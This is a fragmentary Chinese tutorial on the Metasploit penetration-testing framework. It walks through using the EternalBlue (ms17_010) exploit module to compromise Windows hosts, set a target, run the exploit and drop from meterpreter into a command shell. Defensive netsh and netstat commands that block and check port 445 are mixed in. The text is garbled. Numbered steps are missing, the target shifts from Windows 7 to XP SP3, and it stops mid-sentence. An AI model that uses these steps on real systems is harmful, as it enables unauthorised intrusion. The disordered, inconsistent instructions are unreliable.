metasploit渗透测试教程

1、一些常用指令msfconsole 打开控制台终端msfupdate 更新help [command] e.g. help search 命令使用帮助信息search […] e.g. search portscanuse … 选择渗透攻击模块

3、攻击实例1、利用永恒之蓝(ms17_010)漏洞攻击win7打开metasploitmsfconsole使用永恒之蓝模块search ms17-01use exploit/windows/smb/ms17_010_eternalblue

5、防御办法：1，网上下载补丁，2，关闭445端口，dos命令：netsh advfirewall firewall add rule name=”deny445” dir=in protocol=tcp localport=445 action=blocknetsh firewall set portopening protocol=tcp port=445 mode=disable name=deny445检测445端口是否开启：netstat -ano -p tcp | find “445”

7、接着设置Exploit target，使用show targets 查看可选项可以看出哪些版本的系统存在此漏洞，攻击的XP系统为WinXP SP3 简体中文版，即使用set target 命令设置目标，此处即为set target 34此时再用show options 可以看到全部设置完成，接着使用exploit 或者 run 进行攻击，执行exploit命令后得到一个meterpreter在meterpreter中输入shell即可进入CMD窗口可以进行一些攻击,如远程桌面控制：